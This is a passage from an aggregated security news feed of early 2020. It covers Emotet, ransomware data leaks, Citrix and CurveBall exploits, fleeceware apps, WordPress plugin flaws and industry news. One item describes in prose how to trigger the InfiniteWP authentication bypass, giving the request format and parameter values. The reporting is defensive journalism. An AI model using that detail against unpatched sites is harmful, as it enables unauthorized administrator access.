Fewer organizations take this alternative approach of “tearing off the band-aid.” If the user experience is frictionless, more efficient, and enhances the ease of data protection, an organization’s highly motivated employee base will adapt much more easily.

Stayed tuned and stay updated

Stay tuned for more! In my next installments, I will cover the topics of process and technology, respectively, and their role in changing the security monolith. Technology on its own solves nothing. What good are building supplies and tools without a blueprint? Similarly, process is the orchestration of the effort, and is necessary to enhance an organization’s cybersecurity, privacy, compliance, and productivity.

In the meantime, bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Changing the monolith—Part 2: Whose support do you need? appeared first on Microsoft Security.

Emotet Locked onto US Military and Government

Emotet Locked onto US Military and Government

New research into the latest victims of Emotet has found increased instances of the malware affecting the United States of America's government and military.

The pernicious malware, which is spread via email, has been infecting organizations all over the world since 2014. By shining a spotlight on Emotet's recent activities, researchers at Cisco Talos discovered that the US government is among the latest victims to be compromised. 

Researchers made the discovery by closely examining the patterns of outbound email associated with the malware. 

A Talos spokesperson said: "If a person has substantial email ties to a particular organization, when they become infected with Emotet the effects would manifest in the form of increased outbound Emotet email directed at that organization. 

"One of the most vivid illustrations of this effect can be seen in Emotet's relationship to the .mil (U.S. military) and .gov (U.S./state government) top-level domains (TLDs). 

"When Emotet emerged from its summer vacation back in mid-September 2019, relatively few outbound emails were seen directed at the .mil and .gov TLDs. But sometime in the past few months, Emotet was able to successfully compromise one or more persons working for or with the U.S. government."

The malware's successful compromise of at least one US government employee led to what researchers described as a "rapid increase" in the number of infectious Emotet messages directed at the .mil and .gov TLDs in December 2019.

Following a brief spot of respite over the winter holidays, Emotet is once again causing trouble. Cisco Talos said that the upward trend in the quantity of messages directed at .mil and .gov had "continued into January 2020."

Emotet works by stealing someone's email, then impersonating the victims and sending copies of itself in reply. The malicious emails are delivered through a network of stolen SMTP accounts. 

Recipients, conned into thinking that they are receiving a message from a friend or professional colleague, open the email and are then infected.

The simplicity of Emotet's attack strategy belies its effectiveness. "This relatively simple email-man-in-the-middle social engineering approach has made Emotet one of the most prolific vehicles for delivering malware that we have seen in modern times," said researchers. 

Alarming Trend: More Ransomware Gangs Exfiltrating Data

Criminals Increasingly Leak Stolen Data to Force Bitcoin Payoff
As if ransomware wasn't already bad enough, more gangs are now exfiltrating data from victims before leaving systems crypto-locked. Seeking greater leverage against non-paying victims, Maze and Sodinokibi attackers are not just threatening to leak stolen data; they're also following through.

LORCA Announces Fourth and Largest Cohort of Cybersecurity Innovators

LORCA Announces Fourth and Largest Cohort of Cybersecurity Innovators

The London Office for Rapid Cybersecurity Advancement (LORCA) has announced the 20 scale-ups selected to join its fourth cohort of cyber-innovators.

The latest group is LORCA’s largest and most international yet – including companies from the UK, Israel, Spain, Switzerland, Denmark, Singapore and the US – using technologies such as automation and quantum to protect UK industry against the latest threats.

LORCA is hosted and delivered by Plexal at Here East in London’s Queen Elizabeth Olympic Park. The year-long project will support the 20 new companies to scale, secure investment, access new markets and participate in overseas trade missions, with the ultimate aim of growing the British cybersecurity industry.

The scaleups will also receive technical and commercial support from the program’s delivery partner Deloitte and engineering expertise from the Centre for Secure Information Technologies (CSIT) at Queen’s University Belfast.

LORCA lanched in June 2018 with backing from the Department for Digital, Culture, Media & Sport and has enrolled 55 companies into its program.

The latest cohort includes scaleups with a range of cutting-edge solutions, invited to apply based on three innovation themes identified by industry leaders from various sectors:

  • Connected Economy
  • Connected Everything
  • Connected Everyone

Saj Huq, program director, LORCA, said: “LORCA exists to bring cutting-edge technology to market and to enable the most promising cyber-innovators to become globally competitive businesses. The international reach and the variety of solutions within our incoming fourth cohort is an exciting demonstration of both the strength and attractiveness of the UK market, as well as an illustration of the increasingly prominent role that LORCA plays as a convener and collaborator within the global innovation ecosystem.”

The 20 companies enrolling in the latest cohort are:

  1. Acreto
  2. Anzen Technologies Systems
  3. Avnos
  4. Contingent
  5. Continuum Security
  6. Darkbeam
  7. Heimdal Security
  8. Keyless
  9. Kinnami
  10. L7 Defence
  11. Orpheus
  12. Osirium
  13. Risk Ledger
  14. ShieldIOT
  15. SureCert
  16. ThreatAware
  17. ThunderCipher (Licel)
  18. Variti
  19. VIVIDA
  20. Westgate Cyber Security

Exploiting Citrix Application Delivery Controller (ADC) and Gateway CVE-2019-19781 with Core Impact

English

A Core Impact module was released on January 14, 2020 to exploit an as-yet unpatched patch traversal flaw in Citrix Application Delivery Controller (ADC) and Gateway (formerly known as NetScaler ADC & NetScaler Gateway) identified as CVE-2019-19781.

This critical vulnerability is a path traversal bug that can be exploited over the internet by an attacker. It can be exploited to remotely execute code, enabling control over devices and access to internal enterprise networks. An attacker would not have to provide authentication credentials for the device when launching an attack. Instead, a threat actor could send a boobytrapped request to the vulnerable Citrix appliance, along with the exploit code they want to execute.

It is estimated that currently, more than 80,000 Citrix implementations are vulnerable. Citrix has now published configuration changes to help users mitigate organizations from being vulnerable to these attacks. The company stated they expect fixes for versions 10.5x through 13.0x to be rolled out between January 20-31, 2020.

For a full list of exploits available within Core Impact, visit https://www.coresecurity.com/products/core-impact/recent-exploits-and-updates.

Penetration testing
Big text: 
Article
Resource type: 
Articles

Bill for New Orleans Cyber-Attack $7m and Rising

Bill for New Orleans Cyber-Attack $7m and Rising

The December cyber-attack on the southern city of New Orleans has caused over $7m of damage.

New Orleans mayor Latoya Cantrell said yesterday that the already alarmingly high figure continues to grow as the city recovers from the incident. 

A cyber-insurance policy taken out by New Orleans prior to the attack has allowed the Big Easy to recover $3m, but the popular vacation city will still be left cruelly out of pocket as a result of the incident. According to Cantrell, the cost is just something that the city will "have to eat."

"This is something that we have to deal with as a city and it is an expense that we also have to eat as a city. It speaks to the priority of infrastructure that has always been a priority of mine and it also speaks to the real push for maintenance of infrastructure. This will be ongoing," Cantrell told Fox8.

The $7m figure does not include the cost of paying a ransom to the attack's perpetrators, who, despite using ransomware to cripple the city's computer networks, never issued a ransom demand. 

In a stoic display of optimism, Cantrell told Fox8 that the ravages wrought by the attack, although bad, could have been far worse. 

She said: "The early detection and the intrusion helped us one. IT halted our networks, shut them down completely, which prevented this cyber-attack from being catastrophic."

Recovery from the attack is still a long way off, according to the city’s chief administrative officer, Gilbert Montano, as New Orleans is currently wading through a significant backlog of work that resulted from the forced reversion to manual governance.

"Now, we’re in the stabilization period. We are trying to rebuild what we had to turn off essentially and that is a long, laborious, time-sensitive process and that’s where I am telling staff and employees we’re looking maybe at a six to eight month window before actual normalcy starts to integrate all of our systems," said Montano.

Expenses that are included in the $7m figure are the cost of purchasing 3,400 new computers and improving the city's IT infrastructure in an effort to prevent future cyber-catastrophes.

Hundreds of million users installed Android fleeceware apps from Google Play

Security experts from Sophos discovered 25 Android apps on the official Google Play that were involved in financial fraud, 600 million affected.

Security researchers from Sophos discovered a set of so-called fleeceware apps that have been installed by more than 600 million Android users.

Fleeceware apps are malicious applications uploaded to the official Google Play Store that were involved in fraudulent activities, these apps offer a short free trial period and if users don’t cancel the “subscription” they charge an excessive amount of money to the Android users.

“The total number of installations of these apps, as reported on Google’s own Play pages, is high: nearly 600 million in total, across fewer than 25 apps; A few of the apps on the store appear to have been installed on 100 million+ devices, which would rival some of the top, legitimate app publishers on Google Play.” reads the analysis published by Sophos.

“We have good reason to believe that the install count may have, in some cases, been manipulated. But some of the apps, including a popular keyboard app that allegedly transmits the full text of whatever its users type back to China, may legitimately have that many downloads.”

Experts warn of the business model behind the Fleeceware apps that can pose significant risks to the Android users,

In September Sophos published a first report that was warning of this phenomenon, the company discovered a first set of 24 Android apps that were charging huge fees (between $100 and $240 per year) for several generic apps (i.e. QR/barcode readers).

Now Sophos discovered a new set of Android “fleeceware” apps that attempt to monetize with this fraudulent behavior. have continued to abuse the app trial mechanism to impose charges to users after they uninstalled an app.

The fleeceware apps have a high install count, some of them have tens millions of installs, a circumstance that suggests that threat actors behind these apps may have used third-party pay-per-install services to increase the number of installed apps

“Some of these apps are very unprofessional looking. Based on past experience, it may have been the case that these app developers could have used a paid service to bloat their install counts and forge a large number of four- and five-star reviews.” continues the report. “You can identify some of these falsified user review clusters if you scrutinize the recent 5 star reviews; one-to-three word, five star reviews have a propensity to be “sockpuppet” reviews.”

Sophos has published a list of the apps classified as fleeceware.

Pierluigi Paganini

(SecurityAffairs – fleeceware apps, fraud)

The post Hundreds of million users installed Android fleeceware apps from Google Play appeared first on Security Affairs.

Introducing Microsoft Application Inspector

Modern software development practices often involve building applications from hundreds of existing components, whether they’re written by another team in your organization, an external vendor, or someone in the open source community. Reuse has great benefits, including time-to-market, quality, and interoperability, but sometimes brings the cost of hidden complexity and risk.

You trust your engineering team, but the code they write often accounts for only a tiny fraction of the entire application. How well do you understand what all those external software components actually do? You may find that you’re placing as much trust in each of the thousands of contributors to those components as you have in your in-house engineering team.

At Microsoft, our software engineers use open source software to provide our customers high-quality software and services. Recognizing the inherent risks in trusting open source software, we created a source code analyzer called Microsoft Application Inspector to identify “interesting” features and metadata, like the use of cryptography, connecting to a remote entity, and the platforms it runs on.

Application Inspector differs from more typical static analysis tools in that it isn’t limited to detecting poor programming practices; rather, it surfaces interesting characteristics in the code that would otherwise be time-consuming or difficult to identify through manual introspection. It then simply reports what’s there, without judgement.

For example, consider this snippet of Python source code:

Here we can see that a program that downloads content from a URL, writes it to the file system, and then executes a shell command to list details of that file. If we run this code through Application Inspector, we’ll see the following features identified which tells us a lot about what it can do:

  • FileOperation.Write
  • Network.Connection.Http
  • Process.DynamicExecution

In this small example, it would be trivial to examine the snippet manually to identify those same features, but many components contain tens of thousands of lines of code, and modern web applications often use hundreds of such components. Application Inspector is designed to be used individually or at scale and can analyze millions of lines of source code from components built using many different programming languages. It’s simply infeasible to attempt to do this manually.

Application Inspector is positioned to help in key scenarios

We use Application Inspector to identify key changes to a component’s feature set over time (version to version), which can indicate anything from an increased attack surface to a malicious backdoor. We also use the tool to identify high-risk components and those with unexpected features that require additional scrutiny, under the theory that a vulnerability in a component that is involved in cryptography, authentication, or deserialization would likely have higher impact than others.

Using Application Inspector

Application Inspector is a cross-platform, command-line tool that can produce output in multiple formats, including JSON and interactive HTML. Here is an example of an HTML report:

Each icon in the report above represents a feature that was identified in the source code. That feature is expanded on the right-hand side of the report, and by clicking any of the links, you can view the source code snippets that contributed to that identification.

Each feature is also broken down into more specific categories and an associated confidence, which can be accessed by expanding the row.

Application Inspector comes with hundreds of feature detection patterns covering many popular programming languages, with good support for the following types of characteristics:

  • Application frameworks (development, testing)
  • Cloud / Service APIs (Microsoft Azure, Amazon AWS, and Google Cloud Platform)
  • Cryptography (symmetric, asymmetric, hashing, and TLS)
  • Data types (sensitive, personally identifiable information)
  • Operating system functions (platform identification, file system, registry, and user accounts)
  • Security features (authentication and authorization)

Get started with Application Inspector

Application Inspector can identify interesting features in source code, enabling you to better understand the software components that your applications use. Application Inspector is open source, cross-platform (.NET Core), and can be downloaded at github.com/Microsoft/ApplicationInspector. We welcome all contributions and feedback.

The post Introducing Microsoft Application Inspector appeared first on Microsoft Security.

ISA Global Cybersecurity Alliance Triples Membership

ISA Global Cybersecurity Alliance Triples Membership

A worldwide cybersecurity alliance established last year by the International Society of Automation (ISA) has tripled its membership in just six months. 

The ISA Global Cybersecurity Alliance (ISAGCA) drew its first breath in July 2019. The organization was set up with the intention to provide an open, collaborative forum to advance cybersecurity awareness, readiness, and knowledge sharing. 

Founded with six initial members, ISAGCA announced on Tuesday that its ranks have since swelled to include an additional 23 companies and organizations. 

As of the end of 2019, the original vanguard of Schneider Electric, Rockwell Automation, Honeywell, Johnson Controls, Claroty, and Nozomi Networks had been strengthened by the addition of aeSolutions, Bayshore Networks, Beijing Winicssec Technologies Co. Ltd., Digital Immunity, Dragos, exida, ISA Security Compliance Institute, ISA99 Committee, Idaho National Laboratory, LOGIIC (Linking the Oil and Gas Industry to Improve Cybersecurity), Mission Secure, Inc., Mocana Corporation, Munio Security, PAS Global, Radiflow, Senhasegura (supporting member), Tenable, TiSafe, Tripwire, WisePlant, Wallix Group, and Xage Security.

The new adherents to the cause have all joined as founding members. Alliance membership is open to all end users, asset owners, government agencies, and other cybersecurity-focused organizations. 

"The cyber threat to critical infrastructure has never been greater," said Eddie Habibi, founder and CEO of newly welcomed ISAGCA member PAS Global

ISA executive director Mary Ramsey said: "When we pair ISA's standards expertise with the real-world experience of companies like PAS, we can make major strides in advancing cybersecurity.

"Our founding members are united in their belief that security is a journey, not a destination, and they are committed to developing the resources that asset owners need to make progress." 

New alliance member Tripwire was sensible of the organization’s potential to influence cybersecurity around the globe. 

A Tripwire spokesman said: "In becoming a founding member of ISA Global Cybersecurity Alliance, Tripwire will participate in creating initiatives to increase industry awareness, creating education and certification programs, and advocating for sensible cybersecurity approaches with regulatory bodies and world governments."

ISAGCA is organized into four general focus areas: Awareness & Outreach, Compliance & Prevention, Education & Training, and Advocacy & Adoption. Each area has an attached working group, actively working on projects that include creating an easy-to-follow, condensed guide to implementing the ISA/IEC 62443 series of standards and setting up a database of speakers with expertise and experience in automation cybersecurity and associated commitments to wax lyrical at industry events.

Apps are sharing more of your data with ad industry than you may think

Apps like Grindr, Tinder and Happn are (over-)sharing data about sexuality, religion, and location with a shadowy network of data brokers. And it's not just dating apps that are doing it...

Business Disruption Attacks Most Prevalent in Last 12 Months

Business Disruption Attacks Most Prevalent in Last 12 Months

Business disruption was the main objective of attackers in the last year, with ransomware, DDoS and malware commonly used.

According to the CrowdStrike Services Cyber Front Lines Report, which offers observations from its incident response and proactive services, a third (36%) of incidents often involved ransomware, destructive malware or denial of service attacks. Crowdstrike determined that these three factors to be focused on “business disruption,” and while an adversary’s main goal in a ransomware attack is financial gain, the impact of disruption to a business can often outweigh the loss incurred by paying the ransom.

Also observed in 25% of the investigated incidents was data theft, including the theft of intellectual property, personally identifiable information and personal health information. IP theft has been linked to numerous nation state adversaries that specialize in targeted intrusion attacks, while PII and PHI data theft can enable both espionage and criminally-motivated operations.

“Typically, this type of data may be used by a cyber-espionage actor to build a dossier on a high-profile target, or a cyber-criminal may sell or ransom the information,” the report said.

To get on to a network, the most popular vector was spear-phishing, accounting for 35% of investigated cases, compared to 16% using web attacks and another 16% using compromised credentials.

Jack Mannino, CEO at nVisium, told Infosecurity that in many cases, we’re struggling with many of the same issues from a decade ago, while we’re seeing an increase in attacks against cloud infrastructure and systems.

“While many organizations have been in the cloud for a while, countless teams are still undertaking transformation and are attempting to replicate security controls that they have developed internally within a new architecture,” he said.

The report also found that organizations that meet Crowdstrike’s 1-10-60 benchmark — detect an incident in one minute, investigate in 10 minutes and remediate within an hour — are improving their chances of stopping cyber-adversaries. However, it found that the vast majority of organizations struggle to meet the 1-10-60 standard in another recent survey, despite the vast majority of organizations seeing adherence to the rule as a “game changer” in ensuring protection. “Adhering to the rule is a challenging benchmark that requires speed and experience,” the report said.

Shawn Henry, chief security officer and president of CrowdStrike Services, said: “The report offers observations into why ransomware and business disruption dominated headlines in 2019 and gives valuable insight into why issues with adversarial dwell time remain a problem for businesses around the world. Strong cybersecurity posture ultimately lies within technology that ensures early detection, swift response and fast mitigation to keep adversaries off networks for good.”

Rui Lopes, engineering and technical support manager at Panda Security, said that the use of cyberspace to carry out all kinds of malicious activities is not going anywhere in 2020, “and while cybersecurity players work to mitigate attacks, organizations struggle on their end with a gap in security experts which may not be covered even if they have a budget for it.”

Fugue open sources Regula to evaluate Terraform for security misconfigurations and compliance violations

Fugue has open sourced Regula, a tool that evaluates Terraform infrastructure-as-code for security misconfigurations and compliance violations prior to deployment. Regula rules are written in Rego, the open source policy language employed by the Open Policy Agent project and can be integrated into CI/CD pipelines to prevent cloud infrastructure deployments that may violate security and compliance best practices. “Developers design, build, and modify their own cloud infrastructure environments, and they increasingly own the security and … More

The post Fugue open sources Regula to evaluate Terraform for security misconfigurations and compliance violations appeared first on Help Net Security.

Two PoC exploits for CVE-2020-0601 NSACrypto flaw released

Researchers published proof-of-concept (PoC) code exploits for a recently-patched CVE-2020-0601 flaw in the Windows operating system reported by NSA.

Security researchers have published two proof-of-concept (PoC) code exploits for the recently-patched CVE-2020-0601 vulnerability that has been reported to Microsoft by the US National Security Agency (NSA).

Microsoft Patch Tuesday updates for January 2020 address a total of 49 vulnerabilities in various products, including a serious flaw, tracked as CVE-2020-0601, in the core cryptographic component of Windows 10, Server 2016 and 2019 editions.

The CVE-2020-0601 flaw is different from any other previously addressed flaws because it was reported by the NSA and this is the first time that the US intelligence agency has reported a bug to the tech giant.

The flaw, dubbed ‘NSACrypt’ or ‘CurveBall,’ resides in the Crypt32.dll module that contains various ‘Certificate and Cryptographic Messaging functions’ used by the Windows Crypto API for data encryption.  

The flaw affects the way Crypt32.dll module validates Elliptic Curve Cryptography (ECC) certificates.

In a press release published by the NSA, the agency explains “the certificate validation vulnerability allows an attacker to undermine how Windows verifies cryptographic trust and can enable remote code execution.”

“A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates.” reads the security advisory published by Microsoft.

“An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source. The user would have no way of knowing the file was malicious, because the digital signature would appear to be from a trusted provider.”

An attacker could exploit the flaw to conduct man-in-the-middle attacks and decrypt confidential information on user connections to the affected software.

An attacker could also trigger the issue to spoof digital signatures on software tricking the system into believing that it is a legitimate application.

NSA pointed out that the CVE-2020-0601 vulnerability can allow an attacker to:

  • launch MitM (man-in-the-middle) attacks and intercept and fake HTTPS connections
  • fake signatures for files and emails
  • fake signed-executable code launched inside Windows

The researcher Tal Be’ery analyzed the flaw and explained that the issue stems from a flawed implementation of the Elliptic Curve Cryptography (ECC) within Microsoft’s code.

According to a high-level technical analysis of the bug security researcher Tal Be’ery, “the root cause of this vulnerability is a flawed implementation of the Elliptic Curve Cryptography (ECC) within Microsoft’s code.”

The US DHS CISA agency also issued an emergency directive urging government agencies to address the bug in their systems in ten days.

“CISA has determined that these vulnerabilities pose an unacceptable risk to the Federal enterprise and require an immediate and emergency action. This determination is based on the likelihood of the vulnerabilities being weaponized, combined with the widespread use of the affected software across the Executive Branch and high potential for a compromise of integrity and confidentiality of agency information.” reads the emergency directive.

Security expert Saleem Rashid first created a proof-of-concept code to fake TLS certificates and allows attackers to set up a site that look-like legitimate ones.

Rashid didn’t publish the exploit code to avoid miscreants using it in the wild. Unfortunately, other experts decided to publicly release the exploit code for the CVE-2020-0601 flaw. Swiss cybersecurity firm Kudelski Security published on GitHub a working exploit for the flaw. Danish security researcher Ollypwn also published an exploit for the CurveBall vulnerability.

The availability online of working exploits for the CVE-2020-0601 vulnerability ensures that threat actors will start exploiting it, for this reason it is essential to patch systems.

Pierluigi Paganini

(SecurityAffairs – CVE-2020-0601, hacking)

The post Two PoC exploits for CVE-2020-0601 NSACrypto flaw released appeared first on Security Affairs.

Facebook users will be notified when their credentials are used for third-party app logins

Facebook will (finally!) explicitly tell users who use Facebook Login to log into third-party apps what information those apps are harvesting from their FB account. At the same time, users will be able to react quickly if someone managed to compromise their Facebook accounts and is using their credentials to access other apps and websites. Login Notifications The new feature, called Login Notifications, will deliver notifications to users via the Facebook app and user’s associated … More

The post Facebook users will be notified when their credentials are used for third-party app logins appeared first on Help Net Security.

China Promises Action on Tech Transfers and IP Protection

China Promises Action on Tech Transfers and IP Protection

Phase One of the US-China trade deal has finally been signed, with promises from Beijing that it will improve protection of IP and trade secrets and end forced tech transfers, although security experts will be skeptical.

The majority of the headlines focused on the scrapping of some mooted tariffs on goods from China including mobile phones and computers, as well as promises to increase imports of US goods by $200bn.

However, in the document itself, major sections are devoted to several areas of concern for many US businesses over the past decade or more.

These include the forced transfer of IP to a local Chinese partner that many foreign businesses have been required to follow in order to gain access to the country’s vast market. In the new document, both parties recognize that such transfers should only happen on “voluntary, market-based terms.

“Neither Party shall require or pressure persons of the other Party to transfer technology to its persons in relation to acquisitions, joint ventures, or other investment transactions,” it continued.

The new deal also contains significant new promises by China to improve protection of intellectual property, trade secrets and confidential business information and combat counterfeiting and piracy online.

“China recognizes the importance of establishing and implementing a comprehensive legal system of intellectual property protection and enforcement as it transforms from a major intellectual property consumer to a major intellectual property producer,” it said.

Specifically, China has agreed to impose “heavier punishment” including jail time and monetary fines to deter IP theft.

However, it remains to be seen whether any of the promises made by Beijing are adhered to.

Both the US and UK famously signed an agreement with China in 2015 promising it would cease all economic espionage activity. Experts revealed that activity began to ramp up again from the Chinese side soon after.

China is also increasing its collection of sensitive corporate data from all firms operating within its borders, under a new corporate social credit system, which recently raised alarm bells at the EU Chamber of Commerce in China.

This could effectively achieve the same end for the Chinese government as forced tech transfers, it warned.

“The system of regulatory ratings necessitates the collection of massive amounts of company data, mostly through mandatory data transfers to government authorities, creating an increasingly complete disclosure of a company’s profile,” the report claimed. “Large data transfers are likely to include some sensitive data points, such as technological details and personnel information.”

Researchers have also recently revealed how Chinese state hacking groups are increasingly using local companies as a front for their espionage activities.

Ako Ransomware Using Spam Attachments to Target Networks

Security researchers observed that Ako ransomware is using malicious spam attachments to go after organizations’ networks. On January 14, AppRiver Senior Cybersecurity Analyst David Pickett contacted Bleeping Computer and told the computer self-help site that his company had observed Ako being distributed via spam email. Using subject lines such as “Agreement 2020 #1775505,” the attack […]… Read More

The post Ako Ransomware Using Spam Attachments to Target Networks appeared first on The State of Security.

Trump Takes on Apple Over FBI’s Backdoor Request

Trump Takes on Apple Over FBI's Backdoor Request

Donald Trump has hit out at Apple after it refused to unlock the iPhone of a suspected terrorist shooter who killed three sailors last month, setting the firm on another collision course with the authorities over its stance on user privacy.

In a developing story reminiscent of the San Bernardino shootings four years ago, Apple declined to help the FBI unlock the smartphone of 21-year-old Royal Saudi Air Force lieutenant who went on a killing spree at Pensacola Air Force base.

Although it claimed to have given the FBI “all of the data in our possession” when approached by agents a month ago, Apple maintained that bypassing the killer’s passcodes would create a dangerous precedent.

“We have always maintained there is no such thing as a backdoor just for the good guys. Backdoors can also be exploited by those who threaten our national security and the data security of our customers,” it said in a statement.

“Today, law enforcement has access to more data than ever before in history, so Americans do not have to choose between weakening encryption and solving investigations. We feel strongly encryption is vital to protecting our country and our users' data.”

However, that wasn’t good enough for attorney general William Barr, who has previously slammed tech companies for their stance on encryption, and Trump, who took to Twitter to share his ire with the world.

“We are helping Apple all of the time on TRADE and so many other issues, and yet they refuse to unlock phones used by killers, drug dealers and other violent criminal elements. They will have to step up to the plate and help our great Country, NOW!” he wrote.

The world’s leading encryption experts agree with Apple and other tech firms that creating backdoors for law enforcers would ultimately undermine security for hundreds of millions of legitimate business and personal users.

In 2018 they penned an open letter to FBI director, Christopher Wray, asking him to explain the technical basis for the Feds’ repeated claims that encryption backdoors can be engineered without impacting user security.

That request remains unanswered.

Israeli spyware firm fails to get hacking case dismissed

Judge orders NSO Group to fight case brought by Saudi activist and pay his legal costs

An Israeli judge has rejected an attempt by the spyware firm NSO Group to dismiss a case brought against it by a prominent Saudi activist who alleged that the company’s cyberweapons were used to hack his phone.

The decision could add pressure on the company, which faces multiple accusations that it sold surveillance technology, named Pegasus, to authoritarian regimes and other governments that have allegedly used it to target political activists and journalists.

Continue reading...

What is Network Penetration Testing?

Estimated reading time: 2 minutes

Network Penetration Testing, also known as pen testing or ethical hacking, refers to the practice of identifying vulnerabilities in networks, systems, hosts or other related devices in a controlled environment. The objective of Network Penetration Testing is to identify and plug gaps in a network’s security apparatus before external actors like hackers find them.

Much like white hat hackers, network penetration tests are a type of external audit deployed by organizations from different sectors. Though similar to vulnerability assessments, there is a major difference: network penetration testing is not dependent on a signature-based approach which could be outdated and unable to discover real-world vulnerabilities. Network penetration testing simulates how a real-world attack on the network may happen. In that sense, it provides organizations with a perspective from the eye of the hacker and hence enables a better understanding of its own security posture.

To ensure there is standardization in approach, network penetration testing normally follows the globally-accepted Penetration Testing Execution Standard (PTES) which was developed in 2009. The methodology generally consists of the below steps –

Pre-engagement interactions

At this stage, the scope of the testing is outlined and finalized. Other pre-engagement interactions are also conducted to fully finalize on aspects of testing, analysis and results.

Intelligence Gathering

This stage is primarily involved in information gathering for the purpose of gaining knowledge about the network or system to be penetrated and its respective connections.

Threat Modeling

In this stage, vulnerabilities are identified within the network through automated scans or deep-dive manual techniques.

Vulnerability Analysis

This stage involves the documentation and analysis of vulnerabilities within the network to formulate an attack plan.

Exploitation

This is the stage where the actual exploitation attempt takes placed on the basis of the analysis of the vulnerabilities discovered.

Post Exploitation

In the Post Exploitation phase, further analysis is done of the exploited network to identify other means of access.

Reporting in Network Penetration Testing

This is a fact-finding stage where findings are analyzed and compiled into a report for action to be taken.

The cybersecurity industry is undergoing a paradigm shift where the focus for enterprises is rapidly shifting from threat detection to threat prevention. In such a scenario, it is imperative that enterprises have regular network penetration tests to gain a better understanding of their security posture. It is not enough anymore to depend on cybersecurity solutions alone; efforts must be taken to test and ensure cybersecurity stays up-to-date against ever-changing threats.

Red Team Assessments by Seqrite

In this regard, enterprises can consider Red Team Assessments which have been recommended by the Reserve Bank of India, India’s central bank, for banking institutions. In a red team exercise, highly trained security consultants attempt to breach the security of the organization to expose potential physical, hardware, software and human vulnerabilities.

A comprehensive Red Team exercise exposes vulnerabilities and risks regarding

  • Networks, applications, switches, mobile devices
  • Social engineering (onsite, telephone, email/text, chat)
  • Physical attacks (pen-drive bypass, camera evasion, alarm bypass, Wi-Fi attack etc.)

Red Team Audits are one among various services offered by Seqrite to enable organizations to proactively protect IT assets and respond to cybersecurity threats. Other services offered include Technical Audits, Compliance Audits, Security Management and Security Consulting.

The post What is Network Penetration Testing? appeared first on Seqrite Blog.

WEF Fears Cyber-Threats and Digital Fragmentation

WEF Fears Cyber-Threats and Digital Fragmentation

Digital fragmentation and cyber-threats are among the top 10 biggest risks facing global businesses over the coming decade, according to the latest World Economic Forum (WEF) report.

The annual Global Risks Report is compiled from interviews with business leaders, academics and others from around the world.

This year there was a heavy focus on environmental concerns, but cyber-related risks also featured strongly, as they have done for years.

In total, 76% of respondents claimed that cyber-attacks disrupting operations and infrastructure would increase in 2020, while a similar number (75%) said the same about online data and financial theft.

Cyber-attacks were also placed in the top 10 risks table in terms of likelihood and impact over the coming decade, while data theft/fraud made it into just the former category.

Information infrastructure breakdown also made it into the top 10 most impactful risks for the coming decade, reflecting respondents’ concerns around the increasingly fragmented online world brought about by geopolitical rivalries and competing standards.

The WEF report pointed to fourth industrial revolution (4IR) technologies as bringing tremendous gains to society and the global economy, but also unintended cyber-risk, as the attack surface grows exponentially.

Quantum computing, 5G, cloud computing, AI and IoT were all highlighted as areas of concern, as was the lack of an effective and unified global cyber-governance framework.

Fragmentation of the digital world threatens to stifle the development of 4IR technologies and will add extra cost for businesses, it warned.

“Businesses are facing the challenge of implementing existing cybersecurity and 4IR standards (where they exist), while ensuring compliance with fragmented regulations on accountability, transparency, bias and privacy for developing — or simply applying — 4IR technologies,” the report continued.

“Because government and corporate leaders equally share the responsibility for promoting global cybersecurity and digital trust, cooperation between the public and private sectors is more vital than ever in areas such as information-sharing, collaboration with law enforcement agencies, and skill and capacity development.”

Renaud Deraison, CTO at Tenable, said the report’s findings made sense.

“As the world seeks continued growth and competitiveness in the global economy, we’re seeing many new projects take off, including building modern factories that are highly automated. This innovation can’t happen without a good grasp of the security and integrity of the digital components those factories rely on,” he argued.

“It’s not just about stopping bad actors from damaging these mission-critical services, as experienced in cities across the world, it's also about preventing them from getting a foothold in our environments to cause harm, be it physical, data theft or financial gain.”

Critical auth bypass issues affect InfiniteWP Client and WP Time Capsule WordPress plugins

WP Time Capsule and InfiniteWP WordPress plugins are affected by security flaws that could be exploited to take over websites running the popular CMS.

Experts at security firm WebArx have ethically disclosed vulnerabilities in WP Time Capsule and InfiniteWP plugins, both were patched earlier this month by the developer Revmakx.

The flaws in WP Time Capsule and InfiniteWP WordPress plugins could be exploited to take over websites running the popular CMS that are more than 320,000.

we found that the InfiniteWP Client and WP Time Capsule plugins also contain logical issues in the code that allows you to login into an administrator account without a password.” reads the security advisory published by the experts.

The plugins are affected by logical issues that could allow attackers to log in as administrators without providing any password.

Security systems like firewalls might fail to detect the attempt of exploitation for these issues because authentication bypass vulnerabilities are often logical mistakes in the code and don’t actually involve a suspicious-looking payload.

InfiniteWP allows users to manage unlimited number of WordPress sites from their own server, it has an estimated 300.000 installs.

The attacker could trigger the issue by sending a POST request with the payload written first in JSON and then encoded in Base64. The request will bypass the password requirement and log in with only the username of an existing account. All the attackers need to know is the username of an administrator on the WordPress site.

“The issue resides in the function iwp_mmb_set_request which is located in the init.php file. This function checks if the request_params variable of the class IWP_MMB_Core is not empty, which is only populated when the payload meets certain conditions.” continues the analysis.

“In this case, the condition is that the iwp_action parameter of the payload must equal readd_site or add_site as they are the only actions that do not have an authorization check in place. The missing authorization check is the reason why this issue exists.”

InfiniteWP Client versions before 1.9.4.5 are affected by the vulnerability.

WP Time Capsule is a backup tool with around 20,000 installs, to bypass the authentication the attackers need to send a POST request containing in the body a certain string.

Below the timeline for both vulnerabilities:

  • 07-01-2020 – Reported the vulnerabilities to the developer of both plugins.
  • 07-01-2020 – Released protection module to all WebARX customers.
  • 08-01-2020 – Developer of the plugin released a new version for both plugins.
  • 14-01-2020 – Security advisory publicly released.

Don’t waste time, update your plugin installs as soon as possible!

Pierluigi Paganini

(SecurityAffairs – WordPress Plugin, hacking)

The post Critical auth bypass issues affect InfiniteWP Client and WP Time Capsule WordPress plugins appeared first on Security Affairs.

I’m still on Windows 7 – what should I do?

Support for Windows 7 has ended, leaving Marcy wondering how they can protect themselves

I do a lot of work on a Windows 7 desktop PC that is about five years old. I’m a widow and can’t afford to run out and get a new PC at this time, or pay for Windows 10. If I do stay with Windows 7, what should I worry about, and how can I protect myself? I have been running Kaspersky Total Security for several years, which has worked well so far. Marcy

